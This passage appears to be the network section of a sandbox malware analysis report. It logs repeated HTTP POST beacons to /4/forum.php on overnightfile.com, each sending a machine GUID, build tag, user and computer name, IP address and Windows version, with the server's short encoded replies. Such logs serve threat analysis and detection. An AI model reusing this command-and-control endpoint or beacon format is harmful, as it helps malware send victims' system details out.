                                                                                                                                      Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZFUAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:59.978267908 CEST882OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:00.080739021 CEST882INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:59 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNHSMARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:00.397629976 CEST883OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:00.492716074 CEST883INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:00 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 46 55 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBFUYARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:00.794836998 CEST884OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:00.890624046 CEST884INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:00 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 51 4a 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVQJEARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:01.258352995 CEST884OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:01.353295088 CEST885INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:00 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 46 55 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMFUNARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:01.668510914 CEST885OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:01.756225109 CEST885INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:01 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 42 59 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNBYMARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:02.080809116 CEST886OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:02.171083927 CEST886INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:01 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBZAYARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:02.499869108 CEST886OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:02.590312004 CEST887INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:02 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGQJTARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:02.976793051 CEST887OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:03.065212011 CEST887INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:02 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZZAAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:03.540097952 CEST888OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:03.632066965 CEST889INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:03 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 43 58 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVCXEARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:03.952004910 CEST889OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:04.040241957 CEST890INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:03 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 42 59 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVBYEARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:04.555804968 CEST890OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:04.646260977 CEST890INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:04 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 56 45 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHVESARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:04.999409914 CEST891OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:05.090301991 CEST891INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:04 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cCAZXARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:05.410897970 CEST891OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:05.513786077 CEST892INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:05 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 41 5a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGAZTARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:05.845410109 CEST892OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:05.934211969 CEST893INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:05 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZBYAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:06.318648100 CEST893OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:06.409316063 CEST895INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:05 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 43 58 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHCXSARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:06.795124054 CEST896OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:06.887067080 CEST896INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:06 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 59 48 53 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cYHSBARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:07.203433037 CEST896OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:07.291778088 CEST897INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:06 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 5a 41 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNZAMARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:07.598186016 CEST897OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
